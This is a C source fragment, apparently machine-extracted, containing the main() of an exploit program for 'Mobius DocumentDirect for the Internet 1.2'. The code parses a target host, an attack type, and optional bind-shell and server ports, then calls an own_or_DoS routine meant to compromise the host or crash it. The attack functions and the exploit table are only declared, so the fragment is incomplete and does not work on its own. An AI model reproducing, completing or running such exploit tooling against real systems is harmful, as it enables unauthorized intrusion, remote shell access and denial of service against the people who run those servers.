
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {size_t port; int * Xploit_way; } ;


 TYPE_1__* Xploiting_ways ;
 size_t atoi (char*) ;
 int own_or_DoS (char*,size_t,size_t) ;
 int printf (char*,...) ;
 int show_types () ;

main(int argc, char *argv[])
{
 int i;

 for(i=0;;i++) if (Xploiting_ways[i].Xploit_way==((void*)0)) break;
 i--;
 printf("\nMobius DocumentDirect for the Internet 1.2 Xploit by wildcoyote@coders-pt.org\n\n");
 if (argc<3) {
    printf("Sintaxe: %s <host> <type number> [bind shell port] [port (server)]\n",argv[0]);
    show_types();
    printf("\nFlamez to wildcoyote@coders-pt.org\n\n");
 }
 else
    if ((atoi(argv[2])<=i) && (atoi(argv[2])>=0))
    {
     if (argc==3)
      if (atoi(argv[2])>0) own_or_DoS(argv[1],atoi(argv[2]),0);
      else
      {
       printf("- Bad Sintaxe -\n");
       printf("Leaving...\n\n");
      }
     else
        if (argc==4)
        {
         if (atoi(argv[2])>0) own_or_DoS(argv[1],atoi(argv[2]),0);
         else
            own_or_DoS(argv[1],atoi(argv[2]),atoi(argv[3]));
        }
        else
         if ((atoi(argv[3])>0) && (atoi(argv[4])>0))
         {
          Xploiting_ways[atoi(argv[2])].port=atoi(argv[4]);
          if (atoi(argv[2])>0)
           own_or_DoS(argv[1],atoi(argv[2]),0);
          else
           own_or_DoS(argv[1],atoi(argv[2]),atoi(argv[3]));
          Xploiting_ways[atoi(argv[2])].port=atoi(argv[4]);
         }
    }
    else
    {
     printf("- Bad Type Number - [Range 0 - %d]\n",i);
     printf("Let's try again... :P heh\n\n");
    }

}
